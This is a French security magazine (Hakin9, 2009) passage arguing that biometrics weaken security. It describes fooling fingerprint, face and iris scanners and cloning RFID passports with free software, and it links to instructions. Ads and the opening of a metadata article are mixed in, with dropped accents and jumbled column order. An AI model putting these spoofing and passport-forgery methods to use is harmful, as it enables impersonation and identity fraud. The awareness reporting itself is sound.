prsentes car il analyse la couche sous la peau et non la surface du doigt. Mis part cette analyse, un attaquant potentiel se trouve devant un autre problme, savoir la prise de la tension ou l'analyse des vaisseaux sanguins, ralises au moyen d'un diode laser. Une paisse couche de colle pose sur le doigt rendra impossible cette tentative. Une scurit relative des appareils chers, quips de plusieurs capteurs, n'est pas forcement lie leur qualit. Il est plus probable que les attaquants n'ont pas d'accs aux capteurs utiliss, par exemple, par l'arme ou raliss la commande et donc ne peuvent pas vrifier comment ils peuvent les tromper. Si nous trouvons toutefois un cas o le doigt d'un employ a t copi, nous sommes sans dfense. Il est impossible de modifier ses lignes papillaires comme on peut modifier un mot de passe. Il est ncessaire de remplacer le systme par un meilleur. En conclusion, les scanneurs populaires de lignes papillaires installs dans les ordinateurs portables peuvent servir pour faciliter l'accs et leur utilisation rduit le niveau de scurit. Un utilisateur de l'ordinateur portable y laisse normment de traces : sur le clavier, le botier, etc. C'est comme s'il laissait un postit avec le mot de passe coll l'cran de l'ordinateur. Pour accder un ordinateur protg, il suffit de prlever une des empreintes laisses, de crer un doigt artificiel et de l'autoriser dans le systme. Il est possible de le faire chez soi. Ceci donne l'accs la plupart de fonctions sous Vista bien que les fonctions cls sont protges par un mot de passe standard. Les concepteurs du systme taient obligs de prendre en considration qu'une empreinte digitale n'tait pas une protection efficace. Malheureusement, les donnes prives d'utilisateur restent accessibles. Un grand risque se trouve dans le fait

qu'en est-il des capteurs chers ?

Certains fabricants quipent leurs capteurs en protections supplmentaires pour liminer les lignes plates. L'outil est dpourvu d'un simple scanneur et quip d'un metteur. Cet metteur envoie des ultrasons et analyse leur rflexion du doigt. Les fabricants affirment que les scanneurs sont capables de reconnatre toute tentative de tromperie l'aide des matriaux plats. Les informations obtenues d'une socit polonaise

Figure 5. Les empreintes digitales ont plusieurs caractristiques. L'une d'entre elles, c'est la direction dans laquelle sont places les lignes papillaires. Il y en a six : arc, arc en tente, boucle droite, boucle gauche, tourbillon, boucles doubles. D'autres caractristiques sont aussi faciles analyser
16 HAKIN9 6/2009

BIomtrIe
SecureIP Solutions
La scurit de linformation est une chose importante pour les entreprises et mme pour les particuliers. Cest pourquoi SecureIP Solutions vous propose diffrents produits et services pour protger vos prcieuses donnes tels quun service de sauvegarde en ligne, les diffrents produits BitDefender et bien plus encore. http://www.secureip.ca

NUMERANCE

NUMERANCE, Spcialise dans la scurit informatique, intervient auprs des Petites et Moyennes Entreprises, en proposant des prestations daudit, daccompagnement, et de formation. http://www.numerance.fr

Herv Schauer Consultants

Pour plus de renseignement : hakin9@hakin9.org

Herv Schauer Consultants : 17 ans d'expertise en Scurit des Systmes d'Information Nos formations techniques en scurit et ISO27001 sont proposes Paris, Toulouse, et Marseille. http://www.hsc.fr/services/formations/cataloguehsc.pdf Informations : formations@hsc.fr - +33 (0)141 409 704

TippingPoint

TippingPoint est un leader mondial dans la prvention des intrusions rseaux (Network IPS) de 50Mbps 10Gigabits ainsi que la vrification dintgrit de poste et le contrle daccs du rseau (NAC). Tl : 01 69 07 34 49, E-mail : francesales@tippingpoint.com http://www.tippingpoint.com

Sysdream

Cabinet de conseil et centre de formation spcialis en scurit informatique. Lexprience c'est avant tout les recherches publiques, visant amliorer la scurit des applications et des systmes dinformations. Les rsultats disponibles sur des portails de recherche, dans la presse spcialiss. http://www.sysdream.com

MICROCOMS

Microcoms est une socit spcialise dans les produits Microsoft qui a pour vocation d'aider les particuliers, les TPE-PME et les professions librales sur 6 axes principaux de l'informatique : Assister, Dpanner, Conseiller, Scuriser, Former, Maintenir. Tl. : 01.45.36.05.81 e-mail : contact@microcoms.net http://www.microcoms.net

Club .PRO

ALTOSPAM

Ne perdez plus de temps avec les spams et les virus. Scurisez simplement vos emails professionnels. ALTOSPAM est un logiciel externalis de protection de la messagerie lectronique : anti-spam, anti-virus, anti-phishing, anti-scam... Testez gratuitement notre service, mis en place en quelques minutes. http://www.altospam.com OKTEY 5, rue du Pic du Midi 31150 GRATENTOUR

6/2009 HAKIN9

17

DOSSIER
qu'une fois l'empreinte digitale vole, elle pourra tre utilise pendant des annes. Une meilleure manire de se protger consiste opter pour des scanneurs peu populaires qui prennent la tension ou analysent la structure de veines dans le doigt en plus de la structure de lignes. (par exemple, dans les passeports). La plus simple attaque consiste donc rcuprer une image ou un vecteur de caractristiques (s'il n'est pas chiffr) et l'envoyer au systme. Si le programme est gr automatiquement, il est possible de le tromper en lui montrant une photo au lieu d'un visage. Dans le cas d'outils plus avancs, c'est impossible : le scan dure plusieurs secondes o on analyse la frquence de clignements. Si la base ne contient que les vecteurs de caractristiques, il est impossible de restituer le visage sur leur base. En effet, le risque existe que deux personnes soient considres comme les mmes. Les tudes ralises dans les gares allemandes le confirment. Les systmes de reconnaissance de visages ont t tests sur un groupe de volontaires qui devraient se comportent comme toujours pendant un voyage. Les rsultats ne sont pas encourageants : en moyenne, on a trouv 30 % (et 60 % dans le meilleur de cas) de photos correspondant aux visages. Bruce Schneier, spcialiste dans la question de scurit, considre que le rsultat serait suffisant car aprs avoir pris plusieurs photos, il est possible d'obtenir une plus grande prcision. Malheureusement, 0,1 % de cas n'ont pas t correctement attribus pendant les tests. En plus de 2000 volontaires, le systme reconnaissait en moyenne 23 personnes compltement diffrentes tous les jours.

fais voir ton visage...

Les systmes de reconnaissance de visage doivent tre utiliss plutt pour les vrifications (par exemple, trouver un criminel dans une foule) que pour les autorisations (par exemple, ouverture de la porte, passer la frontire, dmarrer un systme d'exploitation). Les recherches s'effectuent par exemple sur les aroports comme une mthode peu invasive. Contrairement aux scanneurs de l'iris ou des lignes papillaires, la premire tape consiste isoler les visages dans l'image de la camra. C'est une tche complexe car les visages peuvent tre tourns, baisss, l'ombre, partiellement cachs, etc. Pour cette raison, le traitement se fait sur une srie d'images. La deuxime tape consiste trouver des caractristiques du visage trouv. Il peut s'agir notamment de la distance entre les yeux, la taille des lvres, la forme du visage et la teinte de la peau. D'aprs ces donnes, on calcule un vecteur de caractristiques enregistres dans la base. Les systmes peuvent fonctionner aussi bien sur les signaux deux dimensions (images individuelles), trois dimensions (modles individuels 3D ou films) ou quatre dimensions (modle 3D en mouvement). Dans le cas des systmes bass sur le mouvement, on analyse en plus d'autres caractristiques comme la frquence de clignements. Une base de donnes parfaite ne doit contenir que les vecteurs de caractristiques et non les images. Mme une petite photo se compose des centaines milliers de photos et comparer deux fichiers graphiques diffrents prend trop de temps pour trouver des visages dans la foule en temps rel (ou presque). Il existe une manire plus sre : la personne qui accde la base de donnes ne saura pas quoi ressemble en ralit une personne donne. Malheureusement, on stocke souvent aussi bien les vecteurs que les images
18 HAKIN9 6/2009

...ou sa photo

Tromper un systme peut avoir deux objectifs. Premirement, nous voulons prendre l'identit de quelqu'un d'autre. De l'autre ct, le but peut tre de rester anonyme. La reconnaissance de visage n'est pas souvent utilise comme un systme d'autorisation en raison des outils peu fiables mais il est toutefois possible d'imaginer cette utilisation diffrente. Les systmes facilitant la connexion au systme peuvent en faire des exemples. Malheureusement, leur efficacit est trs faible. Comme ils se servent d'une camra intgre dans l'ordinateur portable, la rsolution de photos est trs faible. Ils ne peuvent pas analyser si

Figure 6. L'empreinte digitale de Wolfgang Schuble, ministre allemand de l'Intrieur. Son impression permet de tromper 90 % de scanneurs

BIomtrIe
l'image est tridimensionnelle. Il suffit donc de leur montrer une photo imprime de la victime, voire une photo prise par l'appareil dans un tlphone et affiche l'cran. Dans ce dernier cas, la photo doit tre claire et tenue la main sans bouger pendant plusieurs secondes mais cette mthode est efficace. Comme la qualit de la photo ne doit pas tre trs bonne, il est possible de la rcuprer sur un des sites de communauts. Les systmes d'autorisation bass seulement sur une photo sont utiliss trs rarement. La recherche des personnes dans une foule est une solution plus frquente. Dans ce cas-l, l'objectif principal de tromper le systme est de rester anonyme. Les programmes de reconnaissance recherchent dans un premier temps les yeux, ensuite passent aux limites du visage (en utilisant le seuil). Ensuite, ils analysent l'emplacement des lvres, du nez, des oreilles, des sourcils, etc. Il s'agit en gnral de plusieurs plusieurs dizaines d'indices. Il est naturel de cacher les yeux par exemple avec des lunettes de soleil ou l'ombre d'un chapeau. La tte baisse ou une lumire inadquate rendent galement impossible de faire correspondre une image aux donnes de la base. Tourner la tte un angle rendant difficile l'identification peut tre difficile car la technique consiste rcuprer les films dans les grandes zones : la personne peut ne pas voir toutes les camras. En gnral, elles sont montes en hauteur (dans les centres villes, les aroports) donc baisser la tte est une meilleure solution que de la tourner. Le systme de surveillance utilis aux tats-Unis a t compltement compromis lorsqu'il s'est avr que son efficacit tait beaucoup moins grande que prvu. Il avait pour but de comparer les photos de camras celles de la base de donnes nationale, contenant des copies de photos des permis de conduite, des passeports, etc. Le plus grand dfaut de cette ide tait li au fait que la plupart de personnes souriaient sur les photos et ne le faisaient pas lorsqu'ils allaient prendre une place l'avion. C'est un grand problme pour les systmes : avec le sourire, le visage change trop sa forme. Pour rsoudre le problme, il faudrait attribuer tout le monde plusieurs photos mais certains tats amricains ont dcid d'interdire de sourire sur les photos prises pour les permis et les passeports. Tous les systmes bass sur la technique de reconnaissance de visage sont actuellement trop faibles et ne sont pas efficaces dans les conditions diffrentes aux conditions parfaites pour servir d'une protection suffisante. Les systmes doivent tre grs par des personnes qui contrlent le processus de scan. Les techniques de traitement d'images utilises actuellement sont peu efficaces dans la reconnaissance de visages pour servir d'authentification. Les problmes se trouvent aussi bien du ct technique (problmes relatifs au traitement d'images) que physique (mimique de visage qui change, visage cach). Un grand nombre de fausses alarmes (c'est--dire, une attribution errone d'une personne une photo de la personne recherche) constitue un dfaut des systmes de ce type. Pour tromper les programmes utiliss actuellement, il suffit de sourire pendant la prise de la photo pour la base de donnes et tre srieux pendant le contrle (ou inversement). Accder un systme protg par un capteur de visage est aussi simple : il suffit de lui montrer une photo. digitales, nous parlons de plusieurs dizaines de points caractristiques maximum, dont seuls plusieurs sont utiliss, l'iris de chaque personne en contient plus de 260. En scannant deux yeux, nous obtenons plus de 500 caractristiques. Ceci peut tre prometteur mais la mise en place des systmes de reconnaissance d'iris n'est pas si simple et les anciens appareils sont, malgr les apparences, faciles tromper. Le scan fonctionne de la mme manire que pour l'empreinte digitale : les points recherchs, ce sont des caractristiques, les vecteurs de caractristiques sont dfinis et le rsultat enregistr dans la base de donnes. En raison du nombre de points analyss, on effectue dans un premier temps des tests gnraux et si les rsultats sont positifs d'autres tests sont raliss. Malheureusement, les scanneurs ne sont pas infaillibles. Bien que d'aprs les fabricants leur efficacit soit proche de 100 %, en pratique, ils chouent face aux personnes sobres, fatigues et lucides. Il en est ainsi car les vaisseaux sanguins sont alors trs tendus. La structure dlicate d'un oeil vascularis fait perdre les caractristiques de l'iris quelques secondes aprs la mort du propritaire. Nous n'avons donc pas craindre qu'un attaquant pourrait arracher un oeil pour tromper le systme, condition qu'il sache que c'est inutile. Dans le cas des anciens appareils, il est toutefois possible de les tromper. Nous pouvions tromper la premire gnration des scanneurs avec une photo condition que sa rsolution ait t leve. Dans les appareils plus rcents, une protection supplmentaire a t mise en place : analyse de reflets. Au premier abord, il semblerait qu'un papier photo brillant pourrait tre utilis pour tromper le scanneur. Cette solution n'est pas toutefois suffisante. Quatre rflets se forment dans l'oeil suite la rfraction de la lumire du fond de l'oeil. Il n'est pas toutefois ncessaire d'analyser un modle trois dimensions. Les tests effectus sur les scanneurs utiliss dans les aroports en Arabie Saoudite ont dmontr qu'il tait beaucoup plus simple de tromper les appareils. Il suffit de dcouper un trou
6/2009 HAKIN9 19

iris le seul dans son genre

L'une des manires les plus efficaces d'autorisation l'aide de la biomtrie consiste scanner l'iris. D'aprs des tudes diverses et varies, sa forme finale se dfinit entre le troisime mois de grossesse et la deuxime anne de vie d'un homme et peut donc servir quasiment tout le monde. De plus, l'oeil est toujours protg contre les endommagements et la forme de l'iris reste inchange tout au long de la vie ( l'exception des incidents imprvisibles). Contrairement aux empreintes digitales, les iris des jumeaux monozygotes sont diffrents. Si on russit cloner un homme dans l'avenir, sa copie aurait un iris diffrent. Jusqu' prsent, on n'a pas trouv deux iris identiques. Ils sont donc le plus probablement uniques pour chacun d'entre nous. Si, en cas d'empreintes

DOSSIER
dans la photo dans l'emplacement de l'iris et poser cette photo sur son propre oeil. Le capteur dtectera les reflets corrects dans notre oeil et sur la photo brillante et passera l'analyse de l'iris. Il est impossible de tromper les scanneurs les plus rcents de cette manire. Ils reposent sur les micromouvements du globe oculaire, caractristiques pour chacun d'entre nous. Une autre manire consiste utiliser la lumire infrarouge qui analyse la chaleur diffuse par les vaisseaux sanguins de l'oeil. Actuellement, il semblerait que cette protection soit impossible briser mais si les nouveaux appareils deviennent plus populaires, une manire simple sera trouve pour les tromper, comme c'tait le cas des doigts artificiels. Le cot des scanneurs modernes qui prennent des photos infrarouges et analysent les micromouvements pose un grand problme aux personnes qui souhaitent mettre en place un systme biomtrique bas sur le scan des iris. Il ne faut pas s'attendre ce que ces appareils soient achets par des socits civiles aussi souvent pour que les mthodes pour tromper les modles les plus rcents soient connues. Il faut s'attendre ce qu'un appareil soit vieux, simple et donc plus facile tromper. Le ct unique d'iris, un grand nombre de caractristiques et une analyse non invasive font que l'analyse d'iris est l'une des plus utiles mthodes biomtriques. Malheureusement, les anciens capteurs peuvent tre tromps trs facilement en prsentant une photo devant le scanneur. Les nouveaux appareils semblent relativement scuriss mais sont chers. Ils seront donc utiliss moins souvent, pas dans les buts privs en tout cas. ces bases. Les empreintes ne doivent pas tre stockes sous forme publique, mais tant que l'enregistrement du vecteur de caractristiques n'est pas standardis, une solution contraire aurait rendu impossible l'change d'informations entre les organisations. La manire de stocker les donnes biomtriques est aussi controverse. D'normes bases de donnes, cres notamment par les gouvernements amricaine, britannique et australien, et dans un moindre degr, europen, pose le risque de fuite d'informations. Mme si ces informations ne sont pas utilises tout de suite, elles peuvent l'tre des annes aprs. La dure de vie d'un mot de passe est plus courte que les caractristiques non changeantes du corps. La personne qui obtient un accs aux informations biomtriques pourra se connecter tous les systmes protgs de cette manire. Ajouter des bases de donnes plus modernes peut galement poser des problmes. Si dans l'avenir, un nouvel ensemble d'informations apparatra, il peut contenir des donnes dj collectes. Il doit donc tre possible de dchiffrer les vecteurs de caractristiques stocks. Dans le cas contraire, il serait ncessaire de les collecter pour une nouvelle fois. De plus, en cas d'change d'informations entre des institutions diffrentes (par exemple, des pays qui emploient des systmes diffrents), il faut avoir la possibilit d'changer les empreintes digitales, les photos connues, etc. Pour le rendre possible, il faut stocker les donnes compltes et non seulement la fonction de hachage du vecteur de caractristiques. C'est un autre argument pour affirmer que les donnes collectes une fois peuvent constituer un risque potentiel pour toujours. Collecter un grand nombre de donnes peut s'avrer inutile et augmenter la taille des bases. S'il s'avre qu'une partie d'informations est inutile, elles peuvent fuir. Les personnes, qui pensent que le nombre de donnes n'est jamais suffisant, doivent s'intresser au concours organis par le gouvernement de la Grande Bretagne. Le gouvernement a en effet propos que les utilisateurs inventent l'utilisation des donnes car il ne sait pas que faire avec. Cela n'empche pas de continuer les collecter.

Beaucoup de donnes, un grand risque

Dans l'avenir, les employs malhonntes qui ont l'accs aux bases de donnes peuvent poser des problmes. La Pologne

une fois pour toutes

Un autre point concerne la manire de collecter et de stocker les informations biomtriques. Nous utilisons l'empreinte digitale au travail car c'est pratique mais nous ne pouvons pas tre srs qu'est-ce que lui va arriver. Les empreintes digitales, ce ne sont pas les donnes personnelles, d'aprs Michael Chertoff, secrtaire amricain la scurit intrieure. Les administrateurs de bases de donnes peuvent donc faire quasiment tout avec
20 HAKIN9 6/2009

Figure 7. Les fabricants de scanneurs biomtriques recommandent officieusement de les utiliser uniquement comme un complment du systme de contrle et jamais comme la seule protection

tudiants un abonnement en prix unique destin vous !

35

30

Envoyez nous votre document dtudiant scann et notre bon dabonnement, vous recevrez vos magazines juste votre domicile ! Rejouissez-vous de votre jeunesse et sautez sur loccasion!

6 numros pour un prix unique !

1 Coordonnes postales : 2 Nom : Prnom : Adresse :

Je souhaite mabonner au magazine Hakin9

Je rgle par :

Carte bancaire n CB expire le code CVC/CVV date et signature obligatoires type de carte ........................................................................................................

Code postal : Ville : Pays :

Virement bancaire : nom banque : socit Gnrale chasse/rhne banque guichet numro de compte cl 30003 01353 00028010183 90 iBan : Fr76 30003 01353 00028010183 90 adresse swift (code Bic) : soGeFrPP
Date et signature

DOSSIER
ne prvoit pas de crer une base de donnes centrale unique. Les donnes biomtriques seront stockes dans plusieurs bureaux chargs d'mettre les passeports. Il existe toutefois des pays, comme la Grande Bretagne ou l'Australie, qui crent de grandes bases de donnes. Si des personnes non autorises accdent ces informations, grer l'ensemble de systme n'aurait aucun sens. Il faut remarquer que la solution est plus complexe que la base de donnes elle-mme. Des points d'o on collecte des donnes, des portails de contrle (par exemple, sur les aroports) et des systmes de copies de sauvegarde y sont connects. La protection de tous les sous-ensembles semble peu probable et onreuse. Le systme amricain peut en tre exemple. Son cot estim 40 millions de dollars a augment un milliard. Comme le prix est 25 fois plus lev que prvu, il est vident qu'on a dcouvert des dfauts pendant la conception du systme. Une question se pose : combien de failles reste-t-il corriger ? Collecter et stocker les donnes pose plus de risque que les tentatives individuelles pour tromper les systmes biomtriques. La taille du systme, la ncessit d'changer les informations entre les solutions non compatibles et l'impossibilit de modifier les donnes voles rendent les attaques trs attrayantes. Les informations obtenues (par exemple, dans les passeports hollandais) peuvent devenir prcieuses dans l'avenir lorsque la biomtrie deviendra plus commune. Le RFID se prte tre utilis dans les magasins et les boutiques mais sa mise en place dans les passeports n'avait pas de sens et a eu un impact sur la scurit de ce document. Aprs une prsentation effectue au Pays-Bas en 2006 pendant laquelle des informations ont t collectes sur les dtenteurs de passeports prsents l'aroport, des couvertures spciales ont t introduites. Elles fonctionnent comme une cage de Farday (elles isolent l'intrieur contre les ondes lectromagntiques). Il est donc ncessaire actuellement d'ouvrir le passeport et de l'approcher du capteur, comme si le module de communication n'tait pas sans fil. En ouvrant la couverture, quelqu'un (une personne ct) peut faire des copies, ce qui poserait plus de problmes dans le cas des systmes ncessitant un contact direct. Les passeports biomtriques quip de RFID sont utiliss actuellement par environ 45 pays. La puce contient plusieurs fichiers auxquels l'accs est quasiment illimit et la cl prive, stocke dans une zone inaccessible de la mmoire. Les donnes obligatoires sont les suivantes : informations personnelles (nom, date de naissance, sexe, etc.), photo enregistre sous forme de fichier JPG ou JPG2000, fichier garantissant l'intgrit des donnes enregistres et index de tous les fichiers. Les autres informations constituent une deuxime donne biomtrique (empreinte digitale) et une protection contre les copies. Les deux dernires donnes sont employes par cinq pays : l'Australie, le Canada, la Nouvelle-Zlande, le Japon et leSingapour. Plusieurs pays testent les protections optionnelles (Allemagne, tats-Unis, Grande Bretagne). La puce est capable de contenir d'autres caractristiques biomtriques mais personne ne prvoit de les ajouter pour l'instant. Comme tous les pays n'enregistrent pas les informations, telles que l'empreinte digitale ou les donnes confirmant l'authenticit d'un document, elles sont ignores. Les passeports des pays susmentionns constituent une exception. Au lieu donc de cloner ou falsifier un passeport australien ou japonais, il est

Biomtrie l'ordre

Les passeports mis en place depuis plusieurs annes contiendront au moins deux informations biomtriques. L'une d'entre elles, obligatoire, est une photo de visage, enregistre au format JPG. La seconde propose par certains pays, c'est l'empreinte digitale. Ces informations seront enregistres dans la puce intgre dans la couverture du passeport. Elle contient un circuit RFID, qui permet un accs sans fil la mmoire du passeport d'une distance de 20 cm (jusqu' 2 mtres dans les bonnes conditions).
22 HAKIN9 6/2009

Figure 8. Les nouveaux scanneurs d'iris analysent les rflexions du fond de l'oeil afin de dtecter des photos. On peut les tromper par une photo dcoupe au niveau de l'iris qu'on place sur notre visage et notre oeil.

BIomtrIe
comme une seule et unique protection de n'importe quelle donne. Les scanneurs de visage et d'empreintes digitales populaires peuvent tre tromps avec une photo. La scurit des systmes plus chers repose sur leur faible accessibilit et donc sur l'impossibilit de trouver les points faibles de l'appareil. Bien que les fabricants d'quipements biomtriques affirment que leurs appareils augmentent la scurit, c'est loin d'tre vrai au jour d'aujourd'hui. Le plus grand dfaut se trouve dans les principes de ce type de systmes : une fois les donnes voles, elles permettront un accs constant aux services protgs. Pour cette raison, les systmes biomtriques peuvent tre employs comme une protection supplmentaire (par exemple, mot de passe et scan de l'oeil) ou seuls pour faciliter un accs pour les attaquants potentiels aussi d'ailleurs. La question des passeports biomtriques est similaire. Les institutions qui les mettent en place se rendent compte qu'il s'agit des solutions peu sres. Le gouvernement amricain a mis en place une peine de 25 ans de prison ferme aux personnes qui modifient les donnes prsentes dans les passeports et certains tats l'ont mise en place pour les personnes qui lisent les donnes envoyes par les systmes RFID sans accord du propritaire. La plupart de pays n'a protg d'aucune manire les passeports de leurs citoyens, ce qui constitue une norme faille. Copier des documents de certains pays est donc possible chez soi. Tant que les protections compltes ne sont pas mises en place, ce qui n'est pas pour l'instant prvu, collecter des donnes et copier des passeports biomtriques est particulirement simple. Il faut admettre que la biomtrie facilite la vie et l'accs aux donnes. Malheureusement, malgr les ides reues, elle rduit en mme temps le niveau de scurit. propos de l'auteur

Sur le Net
http://www.youtube.com/watch?v=MAfAVGES-Yc film d'instructions comment raliser un doigt artificiel, http://freeworld.thc.org/thc-epassport/ instructions exactes pour crer un passeport, http://www.youtube.com/watch?v=0u4pg_XwNk8 film qui dmontre l'efficacit de la mthode ci-dessus, http://www.youtube.com/watch?v=a00rXJ_51Cc film qui dmontre comment accder un ordinateur protg par un capteur de visages.

plus facile d'opter pour un pays qui n'a mis en place que des informations de base.

elvis a aussi son passeport

En raison des protections trs faibles, l'accs aux donnes est trs simple. Il suffit d'avoir un capteur (pas trs cher) et un logiciel gratuit (par exemple, une application JMRTD, qui implmente le standard mis en place par International Civil Aviation Organization). Ils permettent de lire les informations dans le passeport et de les enregistrer sur une nouvelle carte, donc en pratique de les cloner. JMRTD gnrera lui-mme les fichiers appropris, y compris l'index et le fichier de contrle. Mme dans le cas de l'absence d'accs certaines informations, le programme Golden Reader Tool, utilis aux frontires et dans les aroports n'arrtera pas un passeport falsifi. En cas d'une signature errone, il affiche une erreur mais non critique (non-critical error) et en cas d'un hachage incorrect, il affiche un avertissement (warning). Un hacker appel vonJeek a cr un passeport de Elvis Presley tout en ignorant les informations qui ne sont pas vrifies et il a russi passer les contrles. Pour raliser un nouveau document, il suffit de disposer d'un simple capteur, d'une carte vide et du programme susmentionn. Le schma exact de toutes les oprations effectuer se trouve sur son site Web. La situation pourrait changer si tous les pays utiliseraient l'ensemble des protections de passeports. Elles proposent deux manires de se protger : Basic Access Authentication (BAC) et Active Authentication (AA). Les deux protections sont aujourd'hui optionnelles. BAC est une chane de caractres qui constitue les donnes chiffres. Le numro du document, la

date de naissance et la date d'expiration du passeport constituent la cl pour dchiffrer les donnes. 3DES est l'algorithme de chiffrement. Toutes les informations sont publiques donc crer notre propre BAC ne pose aucun problme. Obtenir les informations initiales d'aprs un fichier chiffr ne prend pas non plus beaucoup de temps, ce qui rsulte de la faiblesse de 3DES. Active Authentication constitue une meilleure protection contre les tentatives d'amateurs de manipulation des passeports. Il se sert de la cl prive qui se trouve dans la zone de mmoire protge. Les attaques connues ayant pour but de l'obtenir consistent analyser la puissance dgage par le systme et les effectuer seulement au moyen d'un capteur est impossible. Malgr tout cela, ces informations sont de toute faon ignores actuellement. Le gnrateur de nombres alatoires constitue un autre dfaut de passeports. Le caractre alatoire ne repose sur une seule variable : nombre de cycles d'horloge depuis le moment o le systme est activ. Gnrer une rponse ne pose donc aucun problme. Tant qu'un contrle d'authenticit n'est pas mis en place par tous les pays, falsifier les passeports est particulirement faciles et bon march. Les tentatives de protection telles que fermer RFID dans la cage de Faraday et les amendes pour les manipulations sur les passeports ne feront pas fuir les fraudeurs potentiels. Utiliser mme toutes les protections proposes par les passeports ne garantit pas la scurit : elles sont dj trop faibles.

Conclusion

Les appareils utilisant la biomtrie ne doivent en aucun cas tre employs

Journaliste publiant notamment dans le magazine Magazyn Internet et PC World . Il s'intresse l'anonymat, aux spams et la cryptographie. Actuellement, il termine ses tudes la facult de l'Electronique et de Tlcommunication l'Ecole Polytechnique de Wroclaw. Contact avec l'auteur : marcin@kosedowski.com. 6/2009 HAKIN9 23

DOSSIER
Wojciech Smol

J'ai vos (mta)donnes !

les mtadonnes constituent une sorte d'ADN des documents chiffrs. Regardez comment les cybercriminels sont capables d'utiliser les informations invisibles prsentes dans les fichiers partags publiquement.

Degr de difficult

D
Cet artiCle explique
la notion des mtadonnes, comment les cybercriminels peuvent utiliser les mtadonnes, la notion des outils employs par les crackers pour rechercher et traiter les mtadonnes, Quelques cas authentiques d'une utilisation surprenante de mtadonnes, les bonnes pratiques dans l'administration de la scurit des (mta)informations.

Ce qu'il faut savoir

connatre les questions de base relatives aux formats de fichiers les plus populaires, connatre les types lmentaires d'attaques dont l'objectif consiste collecter des informations, connatre les oprateurs avancs utiliss dans le navigateur Google. 24 HAKIN9 6/2009

ans la ralit numrique d'aujourd'hui, la plupart d'organisations gnrent, stockent et archivent leurs donnes sous forme numrique. Les systmes informatiques intgrs de la classe ERP (en anglais Enterprise Resource Planning) permettent d'viter d'enregistrer et de stocker des centaines de milliers des feuilles de papier. Les aspects positifs des technologies modernes ne sont pas toutefois l'abri des risques relatifs la scurit d'informations, inconnus auparavant. Ces risques sont lis une caractristique d'information numrique, savoir ses attributs supplmentaires, invisibles au premier abord. Les informations supplmentaires qui caractrisent l'information principale, telles que la date de cration ou de la dernire modification, s'appellent les mtadonnes (en anglais metadata). Ce sont des donnes sur les donnes c'est une description la plus brve de ces structures. Elles constituent un problme supplmentaire dans le domaine de scurit des informations, quasiment inconnu dans le cas de donnes traditionnelles. Les mtadonnes sont souvent ignores dans les procdures de scurit informatique alors que je dmontrerai qu'elles peuvent provoquer une fuite importante de donns dans les piles. Cette situation rsulte probablement du fait qu'elles sont en apparence invisibles et qu'un problme similaire n'existe pas dans le cas de donnes traditionnelles. Ces points ne justifient pas tout de mme les personnes responsables de la scurit

d'informations. Tous ceux qui pensent que la protection approprie des donnes principales rsout compltement le problme de scurit des mtadonnes se trompent aussi. Il ne faut pas compter dans cette question sur l'ignorance des cybercriminels. Un cracker expriment sait srement manipuler les mtainformations, parmi d'autre choses. Il doit non seulement utiliser les mtadonnes pour collecter des informations pour attaquer mais aussi effacer les mtadonnes gnres lors de son activit criminelle (les mtadonnes constituent l'un des objets de base qui intressent l'informatique lgale).

(Mta)donnes

Je n'ai pas utilis l'orthographe (mta)donnes par hasard. Il n'est pas simple en effet de distinguer les donnes et les mtadonnes. Nous sommes incapables d'indiquer des diffrences en analysant la nature de deux types d'informations. Il s'agit tout simplement des informations sous forme numrique. C'est le contexte, dans lequel nous envisageons l'information concrte, qui dcide en pratique des diffrences. titre d'exemple, les paroles d'une chanson enregistre dans un fichier texte constituent des donnes. Si toutefois les mmes paroles sont inclues au fichier son avec l'enregistrement de la chanson, les mmes donnes deviennent des mtadonnes. Il est donc impossible de distinguer ces deux points sans avoir d'informations supplmentaires sur

J'AI vos (mtA)doNNes !

la rsolution en pixels, la miniature de l'image, les coordonnes gographiques exactes de l'endroit o la photo a t prise.

Figure 1. Excursion virtuelle autour d'une maison o une photo numrique a t prise : tout cela est possible grce aux mtadonnes contenues dans le fichier ! le contexte de l'information analyse. La tche principale des mtadonnes consiste fournir des informations permettant d'interprter correctement et d'utiliser l'information principale. titre d'exemple, une suite de caractres 75015 n'apporte pratiquement aucune information utile. Si les mtadonnes code postal en France l'accompagnent toutefois, cela permettra de les utiliser correctement comme les donnes d'adresse. Une autre utilisation importante de mtadonnes, qu'il faut voquer, consiste acclrer et permettre une recherche d'informations principales plusieurs critres (d'aprs de nombreux attributs qui caractrisent les donnes). Nous pouvons considrer que les mtadonnes accompagnent actuellement quasiment toutes les donnes numriques. Des exemples de structures de donnes, contenant des mtainformations auxquelles il faut faire attention sont les suivants : fichiers graphiques comme le format JPG particulirement populaire, documents lectroniques tels que DOC et DOCX, documents au format universel PDF. Tous les trois types susmentionns constituent un risque rel important pour la scurit d'informations en raison de mtadonnes qu'ils utilisent. C'est un risque aussi bien pour les grandes organisations que pour les particuliers. Peu de personnes s'en rendent compte toutefois.

une photo vaut plus que mille mots

Un proverbe connu dit qu'une image vaut plus que mille mots. Dans le cas des photos numriques, cette phrase prend une signification toute particulire. La plupart d'appareils numriques crent des fichiers graphiques par dfaut au format JPG. Ce n'est pas tout : ces appareils enregistrent le plus souvent aussi les mtadonnes dans le fichier au format Exif (en anglais Exchangeable Image File Format). Sans entrer dans les dtails de la spcification Exif, il faut savoir que les mtabalises dcrivent dans ce standard notamment : le nom de l'appareil avec lequel la photo a t prise, les paramtres de l'appareil, tels que dure d'exposition, valeur de l'cran, sensibilit de la matrice, etc., la date de la prise de la photo,

Le problme est li au fait que au moment de partager les photos prises, les particuliers et les grandes organisations font rarement attention aux mtadonnes publies avec ! La plupart d'attributs susmentionns, enregistrs au cours de la prise de photos ne ncessitent aucune explication, nous nous arrterons un instant aux deux derniers paramtres, savoir la miniature de la photo et les donnes de golocalisation. La miniature de la photo est enregistre avec d'autres paramtres pendant la prise de la photo. L'utilisateur de l'appareil traite trs souvent les photos par la suite dans les programmes graphiques spcialiss en modifiant les couleurs, en coupant un fragment, en supprimant les lments inutiles, etc. Si le programme utilis par la personne pour ce but ne supporte pas le format Exif, la photo sera le plus probablement modifie mais ses mtadonnes ne le seront pas. L'utilisateur obtiendra en rsultat une photo modifie contenant la miniature de l'image originale. Quelles peuvent en tre les consquences ? Prenons l'exemple de Catherine Schwartz, prsentatrice amricaine d'une chane tl TechTV. En juin 2003, elle a mis dans son blog plusieurs photos qui la reprsentent seule. Les photos elles mmes n'taient pas particulires, elles montraient la prsentatrice en train de fumer une cigarette. La photo la montrait partir des paules. Les internautes ont dcouvert rapidement que les photos contiennent des mtadonnes trs intressantes. La miniature Exif s'est avre plus intressante que la photo elle-mme car la photo originale 